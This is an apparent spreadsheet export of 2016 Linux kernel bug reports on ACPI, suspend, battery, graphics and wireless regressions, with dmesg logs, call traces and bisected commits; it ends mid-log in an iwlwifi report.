    <t>Created attachment 218241 [details] acpidump output Hi, with 4.7-rc1 the lid of my laptop no longer wakes the system from suspend. In addition to that, dell-wmi no longer loads because it can't find a needed WMI GUID. In the dmesg I found the following: [ 0.422597] ACPI Error: No handler for Region [ECRM] (ffff8802154ec2d0) [EmbeddedControl] (20160422/evregion-166) [ 0.422602] ACPI Error: Region EmbeddedControl (ID=3) has no handler (20160422/exfldio-299) [ 0.422606] ACPI Error: Method parse/execution failed [\_SB.LID0._PSW] (Node ffff8802154f1370), AE_NOT_EXIST (20160422/psparse-542) [ 0.422612] ACPI: _PSW execution failed Both the problems disappear if I revert the following commits. I tried to revert them separately on top of v4.7-rc1, but that didn't work. commit 3d4b7ae96d81dc8ed4ecd556118b632c2707ff08 Author: Lv Zheng &lt;lv.zheng@intel.com&gt; Date: Thu Mar 24 10:43:08 2016 +0800 ACPI 2.0 / AML: Improve module level execution by moving the If/Else/While execution to per-table basis commit 59f0aa9480cfef9173a648cec4537addc5f3ad94 Author: Lv Zheng &lt;lv.zheng@intel.com&gt; Date: Thu Mar 24 10:42:53 2016 +0800 ACPI 2.0 / ECDT: Remove early namespace reference from EC</t>
  </si>
  <si>
    <t>No backlight control with the hotkeys</t>
  </si>
  <si>
    <t>4.5.5</t>
  </si>
  <si>
    <t>2016-06-04 06:08 UTC</t>
  </si>
  <si>
    <t>Ralf Gerbig</t>
  </si>
  <si>
    <t>2016-06-27 07:32 UTC</t>
  </si>
  <si>
    <t>Created attachment 218921 [details] acpidump From email Aaron Lu: Yex /sys/class/backlight/intel_baxklight works (with the patch- never tried without.) BTW, kernel 4.4 is the first kernel where suspend works reliaby, didn't try 4.3. All kernels before went into a kernel panik on suspend after between 2 and 30 suspends. Thanks, Ralf</t>
  </si>
  <si>
    <t>Boot EC Requirement - Missing  /sys/class/power_supply/BAT0 entry (Linux 4.7-rc2)</t>
  </si>
  <si>
    <t>4.7-rc2</t>
  </si>
  <si>
    <t>2016-06-07 13:23 UTC</t>
  </si>
  <si>
    <t>2016-09-27 07:45 UTC</t>
  </si>
  <si>
    <t>Created attachment 219311 [details] Info from Linux 4.6.1 and dmesg from 4.7.0-rc2 On Linux 4.7-rc2 I am getting the following error from dmesg: [ 0.376831] ACPI Error: Method parse/execution failed [\_SB.PCI0.LPCB.EC0.BAT0._STA] (Node ffff880245425820), AE_NOT_EXIST (20160422/psparse-542) [ 0.377584] ACPI Error: Method parse/execution failed [\_SB.PCI0.LPCB.EC0.BAT0._STA] (Node ffff880245425820), AE_NOT_EXIST (20160422/psparse-542) [ 0.377884] ACPI Error: Method execution failed [\_SB.PCI0.LPCB.EC0.BAT0._STA] (Node ffff880245425820), AE_NOT_EXIST (20160422/uteval-103) [ 0.432292] ACPI Error: Method parse/execution failed [\_SB.PCI0.LPCB.EC0.BAT0._STA] (Node ffff880245425820), AE_NOT_EXIST (20160422/psparse-542) This was ok on linux 4.6.1 the following was available in the /sys filesystem: /sys/class/power_supply/BAT0 and BAT0 -&gt; ../../devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A08:00/device:01/PNP0C09:00/PNP0C0A:00/power_supply/BAT0 dmesg reported the following: ACPI: Battery Slot [BAT0] (battery present) Any suggestions please ?</t>
  </si>
  <si>
    <t>BUG: using smp_processor_id() in preemptible [00000000] code</t>
  </si>
  <si>
    <t>4.7-rc5</t>
  </si>
  <si>
    <t>2016-06-08 18:06 UTC</t>
  </si>
  <si>
    <t>2016-07-05 20:48 UTC</t>
  </si>
  <si>
    <t>Created attachment 219331 [details] kernel-log After detecting a USB Mass Storage device [ 11.589843] usb-storage 4-2:1.0: USB Mass Storage device detected a constant flow of kernel-BUGS is reported. [ 11.599215] BUG: using smp_processor_id() in preemptible [00000000] code: systemd-udevd/389 [ 11.599218] caller is debug_smp_processor_id+0x17/0x20 [ 11.599220] CPU: 4 PID: 389 Comm: systemd-udevd Not tainted 4.7.0-rc2 #6 [ 11.599220] Hardware name: Gigabyte Technology Co., Ltd. H87-HD3/H87-HD3, BIOS F10 08/18/2015 [ 11.599223] 0000000000000000 ffff88080466b6c8 ffffffff813fc42d 0000000000000004 [ 11.599224] ffffffff81cc1da3 ffff88080466b6f8 ffffffff8141a0f6 0000000000000000 [ 11.599226] ffff880809fe8d98 0000000000000001 00000000000fffff ffff88080466b708 [ 11.599226] Call Trace: [ 11.599229] [&lt;ffffffff813fc42d&gt;] dump_stack+0x4f/0x72 [ 11.599231] [&lt;ffffffff8141a0f6&gt;] check_preemption_disabled+0xd6/0xe0 [ 11.599233] [&lt;ffffffff8141a117&gt;] debug_smp_processor_id+0x17/0x20 [ 11.599235] [&lt;ffffffff814f0336&gt;] alloc_iova_fast+0xb6/0x210 [ 11.599238] [&lt;ffffffff819ed64f&gt;] ? __wait_on_bit+0x6f/0x90 [ 11.599240] [&lt;ffffffff814f388d&gt;] intel_alloc_iova+0x9d/0xd0 [ 11.599241] [&lt;ffffffff814f7c33&gt;] __intel_map_single+0x93/0x190 [ 11.599242] [&lt;ffffffff814f7d64&gt;] intel_map_page+0x34/0x40</t>
  </si>
  <si>
    <t>Dmitrii Tcvetkov</t>
  </si>
  <si>
    <t>Durring suspend/Resume stress test case page fault crash seen</t>
  </si>
  <si>
    <t>2016-06-10 06:05 UTC</t>
  </si>
  <si>
    <t>Harish</t>
  </si>
  <si>
    <t>2016-07-27 05:53 UTC</t>
  </si>
  <si>
    <t>Created attachment 219541 [details] Crash logs [23972.353262] kernel tried to execute NX-protected page - exploit attempt? (uid: 1036) [23972.353279] BUG: unable to handle kernel paging request at ffff880078492a40 [23972.353293] IP: [&lt;ffff880078492a40&gt;] 0xffff880078492a3f [23972.353307] PGD 3bac067 PUD 3baf067 PMD 80000000784001e3 [23972.353323] Oops: 0011 [#1] PREEMPT SMP</t>
  </si>
  <si>
    <t>general protection fault in cpu offline</t>
  </si>
  <si>
    <t>2016-06-14 09:31 UTC</t>
  </si>
  <si>
    <t>2016-07-05 20:49 UTC</t>
  </si>
  <si>
    <t>Created attachment 219861 [details] complete kernel log booting - suspend - crash On a system with kernel 4.7-rc3 with https://lkml.org/lkml/2016/6/1/310 and https://lkml.org/lkml/2016/6/1/311 suspend failes and the system does not reach suspend-state. There is a general protection fault after setting CPU 1 offline. suspend worked with 4.6.1. [ 43.497650] smpboot: CPU 1 is now offline [ 43.509820] general protection fault: 0000 [#1] PREEMPT SMP [ 43.515569] Modules linked in: cp210x usbserial rc_digittrade mt2060 af9013 dvb_usb_af9015 dvb_usb_v2 dvb_core uas rc_core usb_storage kvm_intel kvm irqbypass input_leds serio_raw ghash_clmulni_intel it87 hwmon_vid firewire_sbp2 firewire_core ppdev lp autofs4 [ 43.539589] CPU: 0 PID: 2171 Comm: pm-suspend Not tainted 4.7.0-rc3 #10 [ 43.546409] Hardware name: Gigabyte Technology Co., Ltd. H87-HD3/H87-HD3, BIOS F10 08/18/2015 [ 43.555196] task: ffff8807f5108000 ti: ffff8807d4434000 task.ti: ffff8807d4434000 [ 43.562909] RIP: 0010:[&lt;ffffffff814f463d&gt;] [&lt;ffffffff814f463d&gt;] intel_iommu_cpu_notifier+0x5d/0xb0 [ 43.572253] RSP: 0018:ffff8807d4437b88 EFLAGS: 00010206 [ 43.577729] RAX: 3a30303a30303030 RBX: 0000000000000400 RCX: 0000000000000001 [ 43.585085] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 00000000ffffffff [ 43.592441] RBP: ffff8807d4437ba8 R08: 0000000006e6b301 R09: 000000010040003c [ 43.599797] R10: 000000000040003c R11: 0000000000019c00 R12: 0000000000000001 [ 43.607153] R13: 0000000000000000 R14: ffff880809f80000 R15: 0000000000000000 [ 43.614510] FS: 00007fb05278f700(0000) GS:ffff88082e200000(0000) knlGS:0000000000000000 [ 43.622849] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 43.628775] CR2: 00007f5ca3e2bb08 CR3: 00000007d3d10000 CR4: 00000000001406f0 [ 43.636131] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 43.643487] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 43.650843] Stack: [ 43.652916] 00000000ffffffe5 ffffffff81e20830 0000000000000017 0000000000000001 [ 43.660594] ffff8807d4437be0 ffffffff810ac6e5 ffffffff8108f270 0000000000000001 [ 43.668278] 0000000000000001 ffffffff81e0b4c0 0000000000000000 ffff8807d4437bf0 [ 43.675963] Call Trace: [ 43.678487] [&lt;ffffffff810ac6e5&gt;] notifier_call_chain+0x45/0x70 [ 43.684590] [&lt;ffffffff8108f270&gt;] ? cpuhp_thread_fun+0x100/0x100 [ 43.690784] [&lt;ffffffff810ac809&gt;] __raw_notifier_call_chain+0x9/0x10 [ 43.697335] [&lt;ffffffff8108e811&gt;] __cpu_notify+0x31/0x50 [ 43.702811] [&lt;ffffffff8108f160&gt;] cpu_notify_nofail+0x10/0x20 [ 43.708736] [&lt;ffffffff8108f291&gt;] notify_dead+0x21/0xe0 [ 43.714124] [&lt;ffffffff8108f270&gt;] ? cpuhp_thread_fun+0x100/0x100 [ 43.720319] [&lt;ffffffff8108ee26&gt;] cpuhp_invoke_callback+0x46/0x140 [ 43.726690] [&lt;ffffffff8108f059&gt;] cpuhp_down_callbacks+0x49/0x90 [ 43.732881] [&lt;ffffffff8108fa97&gt;] ? cpu_hotplug_begin+0x77/0x90 [ 43.738984] [&lt;ffffffff819ebcdc&gt;] _cpu_down+0xbc/0x150 [ 43.744281] [&lt;ffffffff81090024&gt;] disable_nonboot_cpus+0x94/0x210 [ 43.750564] [&lt;ffffffff810cfcbc&gt;] suspend_devices_and_enter+0x34c/0x720 [ 43.757384] [&lt;ffffffff810d0352&gt;] pm_suspend+0x2c2/0x3b0 [ 43.762861] [&lt;ffffffff810cec95&gt;] state_store+0x85/0x90 [ 43.768249] [&lt;ffffffff813fe92f&gt;] kobj_attr_store+0xf/0x20 [ 43.773906] [&lt;ffffffff812379d2&gt;] sysfs_kf_write+0x32/0x40 [ 43.779562] [&lt;ffffffff81236f23&gt;] kernfs_fop_write+0x113/0x190 [ 43.785577] [&lt;ffffffff811be5b3&gt;] __vfs_write+0x23/0x120 [ 43.791055] [&lt;ffffffff8141a3c3&gt;] ? __this_cpu_preempt_check+0x13/0x20 [ 43.797786] [&lt;ffffffff810cba21&gt;] ? update_fast_ctr+0x41/0x70 [ 43.803711] [&lt;ffffffff810cba82&gt;] ? percpu_down_read+0x12/0x50 [ 43.809724] [&lt;ffffffff811bf6b3&gt;] vfs_write+0xb3/0x1b0 [ 43.815021] [&lt;ffffffff81048acf&gt;] ? __do_page_fault+0x1bf/0x420 [ 43.821125] [&lt;ffffffff811c09a1&gt;] SyS_write+0x41/0xa0 [ 43.826333] [&lt;ffffffff819f15db&gt;] entry_SYSCALL_64_fastpath+0x13/0x8f [ 43.832972] Code: c0 7e 56 48 8b 15 5c cc bd 00 49 63 c5 31 db 4c 8b 34 c2 4d 85 f6 74 34 49 8b 56 60 0f b6 c7 48 8b 04 c2 48 85 c0 74 1b 0f b6 d3 &lt;48&gt; 8b 34 d0 48 85 f6 74 0f 48 81 c6 18 03 00 00 44 89 e7 e8 8b [ 43.853477] RIP [&lt;ffffffff814f463d&gt;] intel_iommu_cpu_notifier+0x5d/0xb0 [ 43.860496] RSP &lt;ffff8807d4437b88&gt; [ 43.864204] ---[ end trace ba135f192a8d9bef ]---</t>
  </si>
  <si>
    <t>BUG() in dmesg after loading nouveau module</t>
  </si>
  <si>
    <t>4.7-rc3</t>
  </si>
  <si>
    <t>2016-06-18 16:17 UTC</t>
  </si>
  <si>
    <t>2016-06-24 22:30 UTC</t>
  </si>
  <si>
    <t>Created attachment 220561 [details] dmesg OS: Arch Linux Video adapter: GeForce GTX 780 Ti xf86-nouveau: 1.0.12 I blacklisted nouveau module for full OS initialisation before reproducing, then issued: # modprobe nouveau debug=trace After that screen becomes black and in dmesg appears: BUG: unable to handle kernel NULL pointer dereference at 0000000000000210 Bug is not reproducible with 4.7-rc2 or earlier mainline.</t>
  </si>
  <si>
    <t>Battery level not shown in Clevo n240ju</t>
  </si>
  <si>
    <t>4.4.13</t>
  </si>
  <si>
    <t>2016-06-19 19:51 UTC</t>
  </si>
  <si>
    <t>José Pekkarinen</t>
  </si>
  <si>
    <t>2016-09-05 07:46 UTC</t>
  </si>
  <si>
    <t>Created attachment 220631 [details] dsdt and ssdts of the machine Hi, I recently got one of this pretty rare machines, and the battery monitor is not working at all. I disassembled the dsdt, and I built it using the ssdts associated. Everything seems to be in order, and there is references in the tables to Linux. Changing the acpi_osi variable at boot doesn't make any difference at all. I attach the disassembled dsdt and the ssdts. Let me know if I can help to sort this out. Thanks! José.</t>
  </si>
  <si>
    <t>Byte order of nvdimm fields read from ACPI NFIT table is reversed</t>
  </si>
  <si>
    <t>NVDIMM</t>
  </si>
  <si>
    <t>4.7.0-0.rc4</t>
  </si>
  <si>
    <t>2016-06-29 19:00 UTC</t>
  </si>
  <si>
    <t>kristin.jacque</t>
  </si>
  <si>
    <t>2016-07-01 22:41 UTC</t>
  </si>
  <si>
    <t>drivers_nvdimm</t>
  </si>
  <si>
    <t>Issue is in drivers/acpi/nfit.c. The byte order of nvdimm fields read from the NFIT is the reverse of what is expected. For example, returning nvdimm format 0x103, when 0x301 is expected.</t>
  </si>
  <si>
    <t>Module level code (Lock) - [regression] Kernel does not boot with 7ed18e2d1b6782989eb399ef79a8cc1a1b583b3c</t>
  </si>
  <si>
    <t>4.7.0-rc6+</t>
  </si>
  <si>
    <t>2016-07-08 21:24 UTC</t>
  </si>
  <si>
    <t>2016-09-27 07:22 UTC</t>
  </si>
  <si>
    <t>Kernel fails to boot with this commit. With the commit reverted, everything is fine. I cannot bisect any further - git is failing with "you are trying to use to much memory"(?!) This is a Dell Precision 5510 with the latest (1.2.10) BIOS applied. Let me know what additional information I can provide. commit 7ed18e2d1b6782989eb399ef79a8cc1a1b583b3c Merge: c09230f b6d9015 Author: Linus Torvalds &lt;torvalds@linux-foundation.org&gt; Date: Thu Jul 7 20:49:41 2016 -0700 Merge tag 'acpi-4.7-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/rafael/linux-pm Pull ACPI fixes from Rafael Wysocki: "All of these fix recent regressions in ACPICA, in the ACPI PCI IRQ management code and in the ACPI AML debugger.</t>
  </si>
  <si>
    <t>EC parallelism: parallel _Qxx evaluation problems</t>
  </si>
  <si>
    <t>4.3+</t>
  </si>
  <si>
    <t>2016-07-20 05:20 UTC</t>
  </si>
  <si>
    <t>2016-08-15 08:53 UTC</t>
  </si>
  <si>
    <t>[1.] One line summary of the problem: acpi regression first bad commit 02b771b64b73226052d6e731a0987db3b47281e9 [2.] Full description of the problem/report: I found what I believe is a regression on my Gateway ne570 laptop. The problem is reproducible with kernels v4.7-rc7, v4.4.13 and v4.3. I found dmesg and kern.log were filling with messages like this: Jul 10 17:01:10 buus-ne570 kernel: [ 57.741630] ACPI Error: Method reached maximum reentrancy limit (255) (20150818/dsmethod-341) Jul 10 17:01:10 buus-ne570 kernel: [ 57.803775] ACPI Error: Method reached maximum reentrancy limit (255) (20150818/dsmethod-341) Jul 10 17:01:10 buus-ne570 kernel: [ 57.866294] ACPI Error: Method reached maximum reentrancy limit (255) (20150818/dsmethod-341) Jul 10 17:01:10 buus-ne570 kernel: [ 57.928403] ACPI Error: Method reached maximum reentrancy limit (255) (20150818/dsmethod-341) With the latest stable kernel, 4.7-rc7, the ACPI error messages have changed to reflect a newer version, specifically: Jul 16 12:59:18 buus-ne570 kernel: [ 78.862942] ACPI Error: Method reached maximum reentrancy limit (255) (20160422/dsmethod-340) These messages are repeated several times a second, and then pause for several seconds, then start again. I believe they are the cause of more sluggish behavior than with the older kernels. I have also found that if the machine is idle, there's a pause in the "ACPI Error" messages. I think it depends on how much writing to disk is going on, but that's just a gut feeling. I'm not quite sure how to verify that assumption, or if it would help diagnose the problem. I believe the problem is a regression, because it did not occur with kernels v3.16.7, v3.19.8, or v4.2.8. git bisecting the linux-stable kernel led me to this commit: # first bad commit: [02b771b64b73226052d6e731a0987db3b47281e9] ACPI / EC: Fix an issue caused by the serialized _Qxx evaluations commit 02b771b64b73226052d6e731a0987db3b47281e9 Author: Lv Zheng &lt;lv.zheng@intel.com&gt; Date: Wed Aug 12 11:12:02 2015 +0800 ACPI / EC: Fix an issue caused by the serialized _Qxx evaluations It is proven that Windows evaluates _Qxx handlers in a parallel way. This patch follows this fact, splits _Qxx evaluations from the NOTIFY queue to form a separate queue, so that _Qxx evaluations can be queued up on different CPUs rather than being queued up on a CPU0 bound queue. Event handling related callbacks are also renamed and sorted in this patch. Link: https://bugzilla.kernel.org/show_bug.cgi?id=94411 Reported-and-tested-by: Gabriele Mazzotta &lt;gabriele.mzt@gmail.com&gt; Signed-off-by: Lv Zheng &lt;lv.zheng@intel.com&gt; Signed-off-by: Rafael J. Wysocki &lt;rafael.j.wysocki@intel.com&gt; I can provide an annotated "git bisect log" associating commits from the linux-stable tree with the deb packages I built, installed, and tested to arrive at the "first bad commit". [3.] Keywords (i.e., modules, networking, kernel): [4.] Kernel version (from /proc/version): Linux version 4.7.0-040700rc7-generic (kernel@gloin) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1) ) #201607110032 SMP Mon Jul 11 04:34:25 UTC 2016 [5.] Output of Oops.. message (if applicable) with symbolic information resolved (see Documentation/oops-tracing.txt) Not applicable [6.] A small shell script or example program which triggers the problem (if possible) Not applicable [7.] Environment [7.1.] Software (add the output of the ver_linux script here) Linux buus-ne570 4.7.0-040700rc7-generic #201607110032 SMP Mon Jul 11 04:34:25 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux GNU C 5.4.0 GNU Make 4.1 Binutils 2.26.1 Util-linux 2.27.1 Mount 2.27.1 Module-init-tools 22 E2fsprogs 1.42.13 Jfsutils 1.1.15 Pcmciautils 018 PPP 2.4.7 Linux C Library 2.23 Dynamic linker (ldd) 2.23 Linux C++ Library 6.0.21 Procps 3.3.10 Net-tools 1.60 Kbd 1.15.5 Console-tools 1.15.5 Sh-utils 8.25 Udev 229 Wireless-tools 30 Modules Loaded ac acer_wmi ahci ansi_cprng arc4 ath ath3k ath9k ath9k_common ath9k_hw autofs4 battery bluetooth bnep btbcm btintel btrtl btusb button ccm cdrom cfg80211 coretemp crc16 crc32c_intel crc32_pclmul crct10dif_pclmul cryptd ctr dm_mod drbg drm drm_kms_helper efi_pstore efivarfs efivars ehci_hcd ehci_pci evdev ext4 fat fjes fuse ghash_clmulni_intel hid hid_generic hidp hmac i2c_algo_bit i915 intel_cstate intel_powerclamp intel_rapl intel_rapl_perf irqbypass jbd2 jfs joydev kvm kvm_intel libahci libata libphy lp lpc_ich mac80211 mbcache media mei mei_me mfd_core mmc_core nls_cp437 nls_utf8 parport parport_pc ppdev pps_core psmouse ptp rfcomm rfkill scsi_mod sdhci sdhci_pci sd_mod serio_raw sg shpchp snd snd_hda_codec snd_hda_codec_generic snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_core snd_hda_intel snd_hwdep snd_pcm snd_rawmidi snd_seq snd_seq_device snd_seq_midi snd_seq_midi_event snd_timer soundcore sparse_keymap sr_mod tg3 tpm tpm_tis usb_common usbcore uvcvideo vfat video videobuf2_core videobuf2_memops videobuf2_v4l2 videobuf2_vmalloc videodev wmi x86_pkg_temp_thermal xhci_hcd xhci_pci [7.2.] Processor information (from /proc/cpuinfo): Intel(R) Core(TM) i3-3217U CPU @ 1.80GHz I'll provide the full output if you want it. [7.3.] Module information (from /proc/modules): I can provide this if you want it. [7.4.] Loaded driver and hardware information (/proc/ioports, /proc/iomem) I can provide this if you want it. [7.5.] PCI information ('lspci -vvv' as root) I can provide this if you want it. [7.6.] SCSI information (from /proc/scsi/scsi) Doesn't exist. [7.7.] Other information that might be relevant to the problem (please look in /proc and include all information that you think to be relevant): I can provide acpidump output, not sure if I can attach emails sent to linux-acpi list, so I'm not attaching it now. dmi.bios.date: 10/08/2013 dmi.bios.vendor: Insyde Corp. dmi.bios.version: V2.06 dmi.board.asset.tag: Type2 - Board Asset Tag dmi.board.name: EA50_CX dmi.board.vendor: Gateway dmi.board.version: V2.06 dmi.chassis.asset.tag: Acer Asset Tag String dmi.chassis.type: 10 dmi.chassis.vendor: Insyde Corp. dmi.chassis.version: V2.06 dmi.modalias: dmi:bvnInsydeCorp.:bvrV2.06:bd10/08/2013:svnGateway:pnNE570:pvrV2.06:rvnGateway:rnEA50_CX:rvrV2.06:cvnInsydeCorp.:ct10:cvrV2.06: dmi.product.name: NE570 dmi.product.version: V2.06 dmi.sys.vendor: Gateway [X.] Other notes, patches, fixes, workarounds: This machine has the latest UEFI firmware available from the manufacturer, Insyde v2.06. FWIW, I believe the Gateway NE570 is a re-branded Acer Aspire E1-570.</t>
  </si>
  <si>
    <t>kernel panic: "kernel tried to execute NX-protected page" when resuming from hibernate to disk</t>
  </si>
  <si>
    <t>4.6.x</t>
  </si>
  <si>
    <t>2016-07-25 21:16 UTC</t>
  </si>
  <si>
    <t>shuzzle</t>
  </si>
  <si>
    <t>2016-08-01 03:31 UTC</t>
  </si>
  <si>
    <t>Created attachment 226381 [details] last working .config Overview: When commit 13523309495cdbd57a0d344c0d5d574987af007f is applied to my kernel sources my kernel panics when trying to resume from hibernate to disk. Steps to Reproduce: 1. have a working hibernate/resume setup 2. compile 4.6.x kernel 3. boot and hibernate to disk 4. test various kernels using "git bisect". Actual Results: kernel panics when trying to resume from hibernate to disk. Expected Results: Resume from hibernate to disk like kernels without commit 13523309495cdbd57a0d344c0d5d574987af007f did. I attached my working .config of my 4.5.7 kernel. Any help will be appreciated. Thanks!</t>
  </si>
  <si>
    <t>I7 Generation 6 Laptop remains hot while suspended</t>
  </si>
  <si>
    <t>4.4.0</t>
  </si>
  <si>
    <t>2016-07-26 03:57 UTC</t>
  </si>
  <si>
    <t>Donald AItken</t>
  </si>
  <si>
    <t>2016-08-29 09:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 226451 [details] Dmesg output from point of suspend until successful wake This problem is easily reproduced by booting the latest Ubuntu release (16.040.1) from the "live CD". The laptop wakes from suspend by moving mouse or pressing a key (but not just open lid). Hardware spec http://www.mytoshiba.com.au/products/computers/satellite/c50/pscpna-01601m/specifications The problem persists with a clean install of Ubuntu 16.04.1 retaining the Nouveau video driver but updating the Kernel to 4.6.2. Battery is drained by around 12% per hour while suspended by closing the lid, selecting Suspend from the menu or entering sudo pm-suspend in a terminal.</t>
  </si>
  <si>
    <t>Regression: commit 12549e2 clocksource/drivers/time-armada-370-xp: Convert init function to return error</t>
  </si>
  <si>
    <t>v4.8-rc1 v4.8-rc2</t>
  </si>
  <si>
    <t>2016-07-28 07:40 UTC</t>
  </si>
  <si>
    <t>Ralph Sennhauser</t>
  </si>
  <si>
    <t>2016-08-17 17:51 UTC</t>
  </si>
  <si>
    <t>Created attachment 226641 [details] bisect log Hardware: Linksys WRT1900ACS (shelby) For an almost identical model see WRT1900AC v2 (cobra) [1] Symptoms: Up to printing [ 1.312411] armada38x-rtc f10a3800.rtc: setting system clock to 2016-07-26 20:44:00 UTC (1469565840) all seems as it should. After that going by the times printed on the serial console the boot is more than twice as fast as expected. Dmesg shows the expected times while going by wrist watch it takes an order of magnitude longer than expected to boot. Once booted the device is sort of functional. Known workaround: Reverting commit 12549e27c63c61d76bb059bfafce0a4ee05c7e90 makes later commits usable for me. [1] ./arch/arm/boot/dts/armada-385-linksys-cobra.dts</t>
  </si>
  <si>
    <t>Module level code (Lock) - sysfs is broken due to LoadTable("OEM"...)</t>
  </si>
  <si>
    <t>3.10, 4.6</t>
  </si>
  <si>
    <t>2016-08-01 02:16 UTC</t>
  </si>
  <si>
    <t>2016-11-07 21:08 UTC</t>
  </si>
  <si>
    <t>We are running into an issue in Linux with using dynamic tables and I was hoping you could help or shed some light on the issue. We are creating dynamic OEMx tables based on OS capabilities from _OSC method for CPU power management. During boot time, we patch and install these OEMx tables based on certain setup questions so that they are in ACPI memory and linked in with RSDT/XSDT. In the ASL, we will load them using LoadTable: LoadTable("OEM1", "INTEL", "CPU EIST",,,) // Dynamically load the CPUEIST table However, in Linux, it is generating a blank OEM12 file at the location: /sys/firmware/acpi/tables/dynamic/OEM12 If we use an acpidump tool to dump ACPI tables, we will get an error: /sys/firmware/acpi/tables/dynamic/OEM12 Could not get ACPI table at index 36, AE_BAD_HEADERTool's /sys/firmware/acpi/tables/OEM1 is present and functionality wise, it is working as expected. Any ideas why this table is generated with no data? Is this an issue with Linux by chance or is there a different way to program our ASL to avoid this? We have protections around the LoadTable calls to avoid loading them multiple times.</t>
  </si>
  <si>
    <t>FADT address favor - 32-bit FADT address favor is not working correctly - Dell Vostro 1500</t>
  </si>
  <si>
    <t>2016-08-05 01:06 UTC</t>
  </si>
  <si>
    <t>2016-12-06 02:38 UTC</t>
  </si>
  <si>
    <t>&gt; &gt; IMO, for the time being, you can use quirks. &gt; &gt; Booting your kernel with the following parameters: &gt; &gt; &gt; &gt; acpi=rsdt &gt; &gt; Or &gt; &gt; acpi_force_32bit_fadt_addr &gt; &gt; Or &gt; &gt; Both &gt; &gt; Rafael reverted commit, so I'm ok now. &gt; &gt; Actually acpi_force_32bit_fadt_addr will not help here, because it's take &gt; effect only if address64 != address32. But here these addresses are &gt; the same, therefore access_width is taken from extended address.</t>
  </si>
  <si>
    <t>iwlwifi: 7260: TFD queue hang (Core14)</t>
  </si>
  <si>
    <t>4.6.4</t>
  </si>
  <si>
    <t>2016-08-07 11:43 UTC</t>
  </si>
  <si>
    <t>2016-10-27 21:37 UTC</t>
  </si>
  <si>
    <t>Wireless driver stops working randomly when connected to 802.11n 2.4 GHz network. Kernel log: [16728.938572] wlp3s0: authenticate with 54:e6:fc:98:70:00 [16728.940814] wlp3s0: send auth to 54:e6:fc:98:70:00 (try 1/3) [16728.943656] wlp3s0: authenticated [16728.944589] wlp3s0: associate with 54:e6:fc:98:70:00 (try 1/3) [16728.948343] wlp3s0: RX AssocResp from 54:e6:fc:98:70:00 (capab=0x431 status=0 aid=4) [16728.951845] wlp3s0: associated [17623.631370] iwlwifi 0000:03:00.0: Queue 2 stuck for 10000 ms. [17623.631376] iwlwifi 0000:03:00.0: Current SW read_ptr 194 write_ptr 239 [17623.631410] iwl data: 00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ [17623.631424] iwlwifi 0000:03:00.0: FH TRBs(0) = 0x00000000 [17623.631438] iwlwifi 0000:03:00.0: FH TRBs(1) = 0xc0110049 [17623.631450] iwlwifi 0000:03:00.0: FH TRBs(2) = 0x00000000 [17623.631463] iwlwifi 0000:03:00.0: FH TRBs(3) = 0x80300038 [17623.631476] iwlwifi 0000:03:00.0: FH TRBs(4) = 0x00000000 [17623.631489] iwlwifi 0000:03:00.0: FH TRBs(5) = 0x00000000 [17623.631503] iwlwifi 0000:03:00.0: FH TRBs(6) = 0x00000000 [17623.631516] iwlwifi 0000:03:00.0: FH TRBs(7) = 0x0070900f [17623.631571] iwlwifi 0000:03:00.0: Q 0 is active and mapped to fifo 3 ra_tid 0x0000 [57,57] [17623.631626] iwlwifi 0000:03:00.0: Q 1 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [17623.631682] iwlwifi 0000:03:00.0: Q 2 is active and mapped to fifo 1 ra_tid 0x0000 [194,239] [17623.631737] iwlwifi 0000:03:00.0: Q 3 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.631799] iwlwifi 0000:03:00.0: Q 4 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.631854] iwlwifi 0000:03:00.0: Q 5 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.631908] iwlwifi 0000:03:00.0: Q 6 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.631962] iwlwifi 0000:03:00.0: Q 7 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.632017] iwlwifi 0000:03:00.0: Q 8 is active and mapped to fifo 3 ra_tid 0x0000 [0,0] [17623.632072] iwlwifi 0000:03:00.0: Q 9 is active and mapped to fifo 7 ra_tid 0x0000 [16,16] [17623.632126] iwlwifi 0000:03:00.0: Q 10 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.632192] iwlwifi 0000:03:00.0: Q 11 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.632249] iwlwifi 0000:03:00.0: Q 12 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.632316] iwlwifi 0000:03:00.0: Q 13 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.632370] iwlwifi 0000:03:00.0: Q 14 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.632432] iwlwifi 0000:03:00.0: Q 15 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [17623.632487] iwlwifi 0000:03:00.0: Q 16 is active and mapped to fifo 1 ra_tid 0x03ff [58,164] [17623.632549] iwlwifi 0000:03:00.0: Q 17 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.632603] iwlwifi 0000:03:00.0: Q 18 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.632659] iwlwifi 0000:03:00.0: Q 19 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.632721] iwlwifi 0000:03:00.0: Q 20 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.632775] iwlwifi 0000:03:00.0: Q 21 is inactive and mapped to fifo 0 ra_tid 0xfc00 [0,0] [17623.632837] iwlwifi 0000:03:00.0: Q 22 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [17623.632893] iwlwifi 0000:03:00.0: Q 23 